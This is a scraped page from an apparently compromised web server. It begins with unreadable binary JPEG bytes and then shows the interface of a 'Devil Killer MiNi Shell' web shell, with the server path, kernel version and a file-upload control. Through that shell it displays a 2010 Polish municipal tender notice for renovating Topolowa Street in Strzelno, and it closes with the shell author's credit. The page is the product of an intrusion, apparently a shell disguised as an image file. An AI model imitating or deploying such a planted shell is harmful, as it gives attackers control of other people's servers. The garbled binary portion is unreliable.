JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100120/16562-N-2010.html

<p class="kh_header"><b>Strzelno: Remont ulicy Topolowej w Strzelnie</b><br>
<b>Numer ogłoszenia: 16562 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Strzelna , ul. Cieślewicza 2, 88-320 Strzelno, woj. kujawsko-pomorskie, tel. 052 3182200, faks 052 3182202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzelno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ulicy Topolowej w Strzelnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest remont ulicy Topolowej A-A6(A41) w zakres którego wchodzi wykonanie nakładki bitumicznej, remont wjazdów do posesji oraz wymiana nawierzchni chodników  i wykonanie nawierzchni parkingu, oraz zatoki autobusowej przy budynku szkoły obejmuje odcinek od km 0+000,00 do km 0+363,52 o długości całkowitej 363,52m i jezdni  o szerokości 6,0m do km 0+299,64 i dalej do 299,64+363,52 o szerokości 8,0m. Remont ulicy Parkowej na odcinku B-B2 obejmujący wykonanie chodnika i wjazdów po stronie południowej na docinku od ulicy Topolowej do parku. 
W planie ulica Topolowa składa się z 4 odcinków wyokrąglonych  3 łukami poziomymi R=40-88,0m i kątach zwrotu g=21,328-39,0748[g]. Skrzyżowania z ulicami (dojazdy) i wjazd na parking wyłagodzono łukami o promieniach R=4,0-15,0m. W km 0+117,65-0+193,65 ulokowano zatokę autobusową o długości 76,0m , szerokości 3,0m i P=173,90 m2 o konstrukcji grubości 51cm oraz wiatę przystankową typową o wymiarach 4,2x1,7m. Lokalizacja zatoki wymaga przełożenia istniejącego ogrodzenia szkoły na długości L=78,0m. Remont jezdni polegający na wykonaniu nakładki bitumicznej o grubości 4+4+1,09cm=9,09cm zaprojektowano na powierzchni P=2407,40m2 zaś w miejscach korekty geometrycznej i poszerzeń zaprojektowano pełne koryto pod jezdnię o konstrukcji grubości 46cm i P=365,67m2. Chodniki z kostki brukowej betonowej szarej o grubości 6cm i całkowitej konstrukcji grubości 20cm o P=1662,00m2 zaprojektowano jako obustronne oddzielone od remontowanej jezdni krawężnikami betonowymi 15x30cm wystającymi +12cm zaś od terenów zielonych obrzeżami betonowymi 8x25cm wystającymi +4cm. Wjazdy do posesji o P=230,60m2 zaprojektowano z betonowej kostki brukowej czerwonej o grubości 8cm i grubości całkowitej konstrukcji 42cm oddzielonej od jezdni krawężnikiem betonowym 15x22 obniżonym do 4cm oraz od posesji opornikiem betonowym 12x25cm wtopionym +0cm Skrzyżowania z ulicami lokalnymi (dojazdy) o P=81,30 m2 zaprojektowano z betonowej kostki brukowej szarej o grubości 8cm i grubości całkowitej konstrukcji 50cm oddzielonej od jezdni krawężnikiem betonowym 15x22 obniżonym do 2cm na przejściach i 15x30cm oraz zakończonych opornikiem betonowym12x25cm wtopionym +0cm. Parking dla 22 pojazdów osobowych o stanowiskach 2,3x4,6m i wymiarach 14,2x34,30m zaprojektowano z betonowej kostki brukowej o grubości 8cm i całkowitej konstrukcji 50cm o P=490,50m2 . Parking obramowano krawężnikami betonowymi 15x30cm wystającymi +12cm na wjeździe opornikiem betonowym 12x25cm wtopionym +0cm. Przejścia dla pieszych o szerokości 4,0m oddzielono od jezdni krawężnikami betonowymi 15x30cm obniżonymi do +2cm. Żywopłot przy skrzyżowaniu z ulicą Parkową po przebudowie należy przesadzić z uzupełnieniem braków. Tereny zielone o P=426,80 m2 wykonać poprzez splantowanie i ułożenie 10cm humusu. Zestawienie obmiarów powierzchni : 
POWIERZCHNIA REMONTOWANEJ JEZDNI NAKŁADKA (ASFALTOBETON) 2407,40m2                    
POWIERZCHNIA REMONTOWANEJ JEZDNI KORYTO ASFALTOBETON             365,67m2                                   
POWIERZCHNIA REMONTOWANYCH CHODNIKÓW KOSTKA                          1662,00m2                                                 
POWIERZCHNIA REMONTOWANYCH WJAZDÓW KOSTKA 230,60m2                                                          
POWIERZCHNIA REMONTOWANYCH DOJAZDÓW KOSTKA                                 81,30m2                                                          
POWIERZCHNIA ZATOKI AUTOBUSOWEJ KOSTKA                                             173,90m2                                                                        
POWIERZCHNIA PARKINGU Z KOSTKI                                                                 490,50m2                                                                                               
DŁUGOŚĆ KRAWĘŻNIKÓW                                                                                    1086,70m                                                                                                   DŁUGOŚĆ OPORNIKÓW                                                                                           358,71m                                                                                                    DŁUGOŚĆ OBRZEŻY                                                                                                  763,10m                                                                                                    POWIERZCHNIA ZIELENI                                                                                        426,80m2                                                                                                  OBJĘTOŚĆ NASYPÓW                                                                                               70,010m3                                                                                                   OBJĘTOŚĆ WYKOPÓW                                                                                           788,116m3
2. Zamawiajacy nie dopuszcza możliwości składania ofert częściowych.
3. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
4. Zamawiający informuje, że przewiduje udzielenie zamówień uzupełniających, o których  mowa w art. 67 ust. 1 pkt. 7 ustawy Prawo zamówień publicznych nie przekraczających łącznie 20 % wartości realizowanego zamówienia. 
5. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej. 
6. Wymagany termin wykonania zamówienia: od 28.04.2010 do 15.10.2010.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu jest obowiązek wplaty wadium w wysokości 4.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy, czyli:

1.1   posiadania uprawnień do wykonywania określonej działalności lub czynności,  jeżeli przepisy prawa nakładają obowiązek ich posiadania
1.2  posiadania wiedzy i doświadczenia;
1.3  dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
1.4  sytuacji ekonomicznej i finansowej.

Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełni,w oparciu o informacje zawarte w dokumentach załączonych do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawcy mają dostarczyć:
1) oświadczenie o spełnianiu warunków postępowania, o którym mowa w art. 24 ust. 1 Pzp (Załącznik nr 2 do niniejszej specyfikacji).
2)  aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;
3) aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4)    aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5)  wykazu co najmniej trzech robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
6)   wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami;
7)   opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Warunki gwarancji - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.strzelno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Strzelnie
ul. Cieślewicza 2
88-320 Strzelno
pokój nr 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 11:00, miejsce: Urząd Miejski w Strzelnie
ul. Cieślewicza 2
88-320 Strzelno
pokój nr 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Wieloletni pod nazwą

Creat By MiNi SheLL
Email: jattceo@gmail.com